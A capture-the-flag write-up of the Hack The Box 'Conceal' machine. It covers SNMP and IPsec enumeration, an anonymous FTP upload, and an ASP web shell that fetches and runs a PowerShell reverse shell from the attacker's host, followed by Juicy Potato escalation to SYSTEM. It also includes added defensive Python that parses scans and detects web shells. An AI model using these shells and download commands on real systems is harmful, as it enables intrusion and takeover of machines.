Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.116 All
All: Runs all the scans consecutively.
We get back the following result.
root@kali:~/Desktop/htb/conceal# nmapAutomator.sh 10.10.10.116 All
Running all scans on 10.10.10.116
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:19 EST
Nmap done: 1 IP address (1 host up) scanned in 101.60 seconds
---------------------Starting Nmap Basic Scan---------------------
No ports in quick scan.. Skipping!
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:20 EST
Nmap scan report for 10.10.10.116
Host is up (0.051s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 188.61 seconds
Making a script scan on UDP ports: 500
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
/usr/local/bin/nmapAutomator.sh: line 164: 1941 Segmentation fault $nmapType -sCVU --script vulners --script-args mincvss=7.0 -p$(echo "${udpPorts}") -oN nmap/UDP_"$1".nmap "$1"
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST
Initiating Parallel DNS resolution of 1 host. at 23:23
Completed Parallel DNS resolution of 1 host. at 23:23, 0.02s elapsed
Initiating SYN Stealth Scan at 23:23
Scanning 10.10.10.116 [65535 ports]
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filtered
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27315.03 seconds
Raw packets sent: 131070 (5.767MB) | Rcvd: 2 (168B)
Making a script scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 06:59 EST
Error #486: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
---------------------Finished all Nmap scans---------------------
We have one open port.
Port 500: running isakmp
Before we move on to enumeration, let’s make some mental notes about the scan results.
I’m not familiar with the service running on port 500. A quick Google search tells us that it is the Internet Security Association and Key Management Protocol (ISAKMP), commonly called Internet Key Exchange (IKE). Much of the documentation references configuring IPsec and ISAKMP to build VPNs.
So there are probably other open ports, but we won’t be able to see them until we establish that VPN connection. To do that, we need some kind of key for authentication, and since this is an HTB box, we have to find this key somewhere. So we’ll rerun all the nmap scans to see if we missed any ports the first time around.
Enumeration
Rerunning the UDP scan does give us an extra port.
root@kali:~# nmap -vvv -sU -sV 10.10.10.116
....
Discovered open port 161/udp on 10.10.10.116
Port 161 is open. It usually runs the SNMP service. Let’s check that with nmap.
nmap -p 161 -sU -sC -sV 10.10.10.116
-p: port
-sU: UDP scan
-sC: run default scripts
-sV: version detection
We get back the following result.
The port is running SNMP version 1, and nmap was able to query the service using the default “public” community string. We see that a bunch of ports are open, including FTP, HTTP and SMB. We won’t get access to these ports until we establish a secure connection.
For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.
snmpwalk -c public -v 1 10.10.10.116 > snmp-public.txt
Then run the following command to establish the connection.
root@kali:~# ipsec up conceal
generating QUICK_MODE request 1899279807 [ HASH SA No ID ID ]
sending packet: from 10.10.14.7[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.7[500] (188 bytes)
parsed QUICK_MODE response 1899279807 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{32}
CHILD_SA conceal{33} established with SPIs cea2f2d0_i fbdc1ee6_o and TS 10.10.14.7/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 1899279807 [ HASH ]
connection 'conceal' established successfully
Perfect, the connection was established successfully. Now let’s try and run an nmap scan.
root@kali:~/Desktop/htb/conceal# nmap 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:24 EST
Nmap scan report for 10.10.10.116
Host is up (0.047s latency).
All 1000 scanned ports on 10.10.10.116 are filtered
Nmap done: 1 IP address (1 host up) scanned in 49.03 seconds
The default TCP SYN scan (-sS) does not seem to work, but a TCP connect scan does.
root@kali:~/Desktop/htb/conceal# nmap -sT 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:26 EST
Nmap scan report for 10.10.10.116
Host is up (0.042s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.65 seconds
I have no idea why you would need a TCP connect scan for it to work. However, in the interest of moving forward, let’s run a more comprehensive TCP connect scan.
root@kali:~/Desktop/htb/conceal# nmap -sC -sV -sT -o nmap-vpn.text 10.10.10.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 20:39 EST
Nmap scan report for 10.10.10.116
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-28T01:41:47
|_ start_date: 2020-02-27T01:56:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.89 seconds
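As an added example (not part of the original writeup), here is a small Python parser for nmap's normal output that lists the open ports and flags the weak-configuration findings this scan already surfaced: anonymous FTP, the TRACE method and SMB signing not being required. The sample input is the TCP connect scan output above, copied as-is; the set of risk rules is the editor's own choice of what is worth flagging, not anything nmap itself reports as a verdict.

```python
"""Parse nmap normal output (-oN) for open ports and flag weak-configuration findings.

Added example, not part of the original writeup. NMAP_OUTPUT is the TCP connect
scan output shown in the writeup; RISK_RULES are the editor's own assumptions.
"""
import re

NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.116
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

# A port line looks like "21/tcp open ftp Microsoft ftpd"; nmap pads with several
# spaces, the writeup's copy with one, so \s+ is used throughout.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Substrings of NSE script output that indicate a weak configuration (editor's rules).
RISK_RULES = {
    "Anonymous FTP login allowed": "anonymous FTP enabled",
    "Potentially risky methods: TRACE": "HTTP TRACE method enabled",
    "Message signing enabled but not required": "SMB signing not required",
}


def parse_nmap(text):
    """Return (ports, findings).

    ports    -- list of dicts for every port in state 'open'
    findings -- list of (context, label); context is the port the script output
                belongs to, or 'host' for the host script results section
    """
    ports, findings = [], []
    context = "host"
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            context = f"{port}/{proto}"
            if state == "open":
                ports.append({"port": int(port), "proto": proto,
                              "service": service, "version": version})
            continue
        if line.startswith("Host script results"):
            context = "host"
            continue
        if line.startswith("|"):  # NSE script output line
            for needle, label in RISK_RULES.items():
                if needle in line:
                    findings.append((context, label))
    return ports, findings


if __name__ == "__main__":
    ports, findings = parse_nmap(NMAP_OUTPUT)
    for p in ports:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<14} {p['version']}")
    for context, label in findings:
        print(f"[!] {context}: {label}")
```

Run against the output above it prints the five open TCP ports and three findings; the same three items are the ones the writeup goes on to use or note (anonymous FTP upload, the IIS server, SMB reachable), so this is the kind of pass a defender would run over their own scans to catch them before an attacker does.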
More Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
We get the default Windows Microsoft IIS welcome page. The page source doesn’t contain any sensitive information.
Next, run gobuster to enumerate directories/files.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.116 -o gobuster.txt
dir: directory mode
-w: wordlist
-u: URL
-o: output file
We get back the following result.
Visit the directory in the browser.
It doesn’t contain anything. Let’s see if we can upload files through FTP.
Port 21 FTP
The nmap scan showed anonymous login is allowed.
root@kali:~/Desktop/htb/conceal/upload# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
Let’s test if we’re allowed to upload files. Create a test.txt file on the attack machine.
echo "hello" > test.txt
Upload the test.txt file on the FTP server.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (78.5740 kB/s)
The upload was successful. Let’s see if we can execute the file from the /upload directory on the web server.
Perfect! According to the nmap scan, this is a Microsoft IIS server version 10, so it should be able to execute ASP and ASPX code. Let’s test this out on the web server.
Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
We get an HTTP error saying that the file can’t be served because of the extension configuration. So we can’t upload ASPX files. Next, let’s try an ASP file.
Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.
Initial Foothold
Create a cmd.asp file on the attack machine that contains the following simple web shell.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
The above code executes the whoami command and writes its output to the page. Upload the cmd.asp file to the FTP server and view it in the browser.
We have code execution! Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
When called, this sends a reverse shell back to our attack machine on port 1234.
Set up a listener to receive the reverse shell.
nc -nlvp 1234
Next, change the cmd.asp file to download the PowerShell script and execute it.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Start up a python server in the directory that the shell script resides in.
python -m SimpleHTTPServer 5555
Upload the cmd.asp file to the FTP server and view it in the browser.
We get a shell! Grab the user.txt flag.
Privilege Escalation
Run the systeminfo command.
PS C:\Users\Destitute\Desktop> systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 27/02/2020, 01:56:19
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,154 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,213 MB
Virtual Memory: In Use: 986 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::4e1:f9b6:e5da:2f16
[03]: dead:beef::71d9:f571:4c90:5dc7
[04]: dead:beef::18b2:9ba4:e093:98b9
[05]: dead:beef::4e1:f9b6:e5da:2f16
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We’re on a Microsoft Windows 10 Enterprise 64-bit OS. Let’s first check the system privileges that are enabled for this user.
SeImpersonatePrivilege is enabled, so we’re very likely to get SYSTEM using Juicy Potato. Accounts running the SQL Server service or the IIS service usually have this privilege enabled by design: it allows a service to impersonate other users on the system. Juicy Potato exploits the way Microsoft handles tokens in order to escalate local privileges to SYSTEM.
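The writeup does not reproduce the privilege listing it checked, so as an added example (not from the original post) here is a Python parser for `whoami /priv` output that extracts each privilege and its state and flags the ones that matter for local privilege escalation. The sample output is constructed to resemble what an IIS application pool identity typically reports, not the box's real output; the list of high-risk privileges and the one-line reasons are the editor's own.

```python
"""Parse `whoami /priv` output and flag privileges relevant to local privilege escalation.

Added example, not part of the original writeup. WHOAMI_PRIV_SAMPLE is constructed
(typical of an IIS application pool identity); HIGH_RISK is the editor's own list.
"""

WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a process act as another account or reach into protected
# resources. The Potato family of tools documents that it needs SeImpersonate or
# SeAssignPrimaryToken; the rest are other well-known escalation-relevant privileges.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens obtained from local callbacks",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Table rows follow the '====' separator line. The privilege name is the first
    token and the state ('Enabled'/'Disabled') the last; the free-text description
    sits between them, so the row is split on whitespace and the ends are taken.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        privs[parts[0]] = parts[-1]
    return privs


def risky_privileges(privs):
    """Return [(name, reason)] for every held high-risk privilege.

    'Disabled' privileges are reported too: a privilege present in the token can be
    enabled by the process itself (AdjustTokenPrivileges), so presence is what counts.
    """
    return [(name, HIGH_RISK[name]) for name in privs if name in HIGH_RISK]


if __name__ == "__main__":
    held = parse_whoami_priv(WHOAMI_PRIV_SAMPLE)
    for name, reason in risky_privileges(held):
        print(f"[!] {name} ({held[name]}): {reason}")
```

On the constructed sample this reports only SeImpersonatePrivilege, which is exactly the situation the writeup describes for the IIS account. Because the privilege is granted to IIS and SQL Server service accounts by design, the defender's lever is less about removing it and more about what the writeup's lessons say: extra protection around such accounts, and keeping Windows current, since the Juicy Potato documentation itself notes the technique stops working on later Windows 10 and Server 2019 builds.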
Let’s test it out. Grab the Juicy Potato executable from here and transfer it to the target machine using the following command.
Set up a listener on the attack machine to receive the reverse shell.
nc -nlvp 6666
Then run the Juicy Potato executable. This should attempt to get a token that impersonates SYSTEM and then run our shell.bat file with elevated privileges.
PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
COM -> recv failed with error: 10038
It fails to escalate privileges with the default CLSID. We can get the list of CLSIDs on our system using this script. However, let’s first manually try one of the Windows 10 Enterprise CLSIDs available in the Juicy Potato GitHub repo.
Rerun the Juicy Potato executable with the above specific CLSID.
root@kali:~# nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.116] 49720
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited three vulnerabilities.
An outdated version of SNMP and the use of a default SNMP community string. The community string essentially acts as a password for access to the service. Using the default “public” string, we were able to query SNMP for the IKE VPN hashed password. The administrator should instead have used SNMPv3, since it’s the only version that provides strong authentication and data encryption. If version 1 must be used, the administrator should have changed the community string to one that is not easily guessable.
Weak authentication credentials. The shared secret used to establish the secure connection was cracked in a matter of seconds using an online password cracker. The administrator should have used a stronger shared key that is difficult to crack, or considered using asymmetric encryption.
Insecure configuration of FTP server that allowed anonymous login and file upload. The administrator should have disabled anonymous access to the FTP server. If anonymous access was necessary, the administrator should have configured the FTP server to only allow downloads. This way we would not have been able to upload a reverse shell.
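The FTP lesson above hinges on one combination: a directory anonymous users can write to is also a directory IIS serves and, for .asp, executes. As an added example (not part of the original writeup), the Python below is the triage a defender could run over such an upload directory: it flags files whose extension IIS commonly hands to a script engine and files containing command-execution or code-download primitives. The sample files are constructed; the first is the writeup's own cmd.asp web shell, and the extension list and pattern set are the editor's assumptions rather than IIS's actual handler mappings on this box.

```python
"""Triage files in a web-served, anonymously writable upload directory.

Added example, not part of the original writeup. SAMPLE_UPLOADS is constructed:
cmd.asp is the web shell shown earlier in the writeup, the other files are
harmless stand-ins. SCRIPT_EXTENSIONS and EXEC_PATTERNS are the editor's rules.
"""
import os
import re

# Extensions IIS commonly maps to a script handler rather than serving as static
# content (assumed default mappings; verify against the server's own handler list).
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".svc"}

# Content patterns that indicate OS command execution or remote code download.
EXEC_PATTERNS = [
    (re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I), "invokes WScript.Shell"),
    (re.compile(r'CreateObject\(\s*"Shell\.Application"\s*\)', re.I), "invokes Shell.Application"),
    (re.compile(r"\.(Exec|Run)\s*\(", re.I), "calls Exec/Run on a shell object"),
    (re.compile(r"System\.Diagnostics\.Process", re.I), "spawns a process via System.Diagnostics.Process"),
    (re.compile(r"DownloadString|Net\.WebClient", re.I), "downloads remote code"),
]

SAMPLE_UPLOADS = {
    # The web shell from the writeup, as it would sit in the upload directory.
    "cmd.asp": (
        "<%\n"
        'Set rs = CreateObject("WScript.Shell")\n'
        'Set cmd = rs.Exec("cmd /c whoami")\n'
        "o = cmd.StdOut.Readall()\n"
        "Response.write(o)\n"
        "%>\n"
    ),
    # Constructed harmless files a legitimate anonymous user might drop.
    "test.txt": "hello\n",
    "notes.aspx": '<%@ Page Language="C#" %>\n<html><body>hi</body></html>\n',
}


def triage_file(name, content):
    """Return the list of reasons this file is suspicious in a served upload dir.

    The extension check comes first (a script extension is a problem even when the
    content is benign today, because the file can be overwritten), then each
    content pattern in EXEC_PATTERNS order.
    """
    reasons = []
    ext = os.path.splitext(name)[1].lower()
    if ext in SCRIPT_EXTENSIONS:
        reasons.append("script-executable extension")
    for pattern, label in EXEC_PATTERNS:
        if pattern.search(content):
            reasons.append(label)
    return reasons


def scan_uploads(files):
    """Map each file name to its triage reasons (empty list means nothing flagged)."""
    return {name: triage_file(name, content) for name, content in files.items()}


if __name__ == "__main__":
    for name, reasons in scan_uploads(SAMPLE_UPLOADS).items():
        status = "; ".join(reasons) if reasons else "ok"
        print(f"{name:<12} {status}")
```

The scan catches cmd.asp on three counts and notes.aspx on its extension alone. Detection is the fallback, though: the writeup's own remedy, no anonymous upload or a download-only FTP root, removes the condition, and so does serving the upload directory without script handlers so that a written .asp is returned as text instead of executed.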
To escalate privileges we didn’t exploit a vulnerability so much as the intended design of how Microsoft handles tokens. So there’s really not much to do there except put extra protections in place for these sensitive accounts.